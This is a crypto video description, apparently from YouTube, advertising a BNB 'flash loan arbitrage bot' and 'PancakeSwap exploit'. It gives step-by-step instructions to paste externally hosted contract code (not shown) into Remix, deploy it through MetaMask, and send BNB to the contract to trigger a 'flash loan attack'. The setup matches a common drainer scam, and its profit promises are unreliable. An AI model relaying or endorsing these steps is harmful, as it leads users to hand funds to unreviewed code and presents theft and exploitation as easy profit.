🎱BNB Crypto Flash Loan Trading Bot Tutorial (BSC Network Hack)🎱

🎱BNB Crypto Flash Loan Trading Bot Tutorial (BSC Network Hack)🎱

1,372 View

Publish Date:
31 January, 2024
Category:
Crypto Hacks
Video License
Standard License
Imported From:
Youtube

This is a BNB Flash loan arbitrage tutorial. Follow the flash loan attack tutorial to use the PancakeSwap exploit while it's still available.


👉 Download Metamask:
https://metamask.io/download/


👉 How to Connect MetaMask to BSC Network:
https://academy.binance.com/en/articles/connecting-metamask-to-binance-smart-chain


👉 Flash Loan Contract Code:
https://ghostbin.com/StyOv/raw
or:
https://raw.githubusercontent.com/gteit-soldev/gteit-soldev/main/flash_loan_bot.sol


👉 Contract Deploy Website:
https://remix.ethereum.org


🚨**You need to deposit at least 0.18 per 1000 borrowed for the contract to cover gas fees!!**🚨


🚀 The contract will create a new token and then initiate a flash loan to trade against the token. Within this same contract, the flash loan will be paid back and any profit remaining will be transferred to your wallet. This is called a flash loan arbitrage as it's looking for crypto arbitrage opportunities with the BNB coin.


🚀 To get started, you need to have MetaMask browser extension installed. https://metamask.io or google 'metamask' to ensure you land on the official site.


💡FULL INSTRUCTIONS💡


1. Download and setup the MetaMask browser wallet if you don't have it.


2. Make sure you have enough BNB to pay for the token creation and flash loan contract gas fees.
2a. The amount of BNB you want depends on how much of a loan you pull. It has to be a minimum of 0.18 for the contract to process fast enough. The higher the liquidity, the higher the profit.


3. Open remix.ethereum.org in your browser.


4. Click on contract folder on the left and click New File.


5. Name the file something like flashloanbot.sol.


6. Copy and paste the contract code into the new file.


7. Select the second tab on the left.


8. Choose the compiler that matches the top of the code.


9. Click on compile at the bottom.


10. Once it is finished, go to the third tab on the left.


11. Under environment, click on injected web3. This will connect to your MetaMask wallet so that you can interact.


12. Click on the arrow under deploy.


13. Enter the details for your new token. For the loan amount choose anything from 1000 and up. This needs to be in line with whatever liquidity you decide to deposit (0.18+ per 1000 BNB borrowed).


14. Click transact and then confirm the gas fees to launch the token in MetaMask.


15. Under deployed contracts, copy the new token contract code.


16. Go to your MetaMask or any wallet and send the liquidity to the new contract code.


17. Wait until the transaction is confirmed on the blockchain.


18. Once that is finished, click the arrow and click the red Action button and confirm the gas fees to execute the flash loan attack.


19. That's it! The flash loan will be paid back automatically and any profit will be returned to your wallet in a few seconds/minutes depending on Blockchain Traffic.




UPDATE: 03/05/2022
BSC network had made a little upgrade, but I've upgraded the code accordingly in this version, so it still works and actually works faster now to find liquidity on the network! :D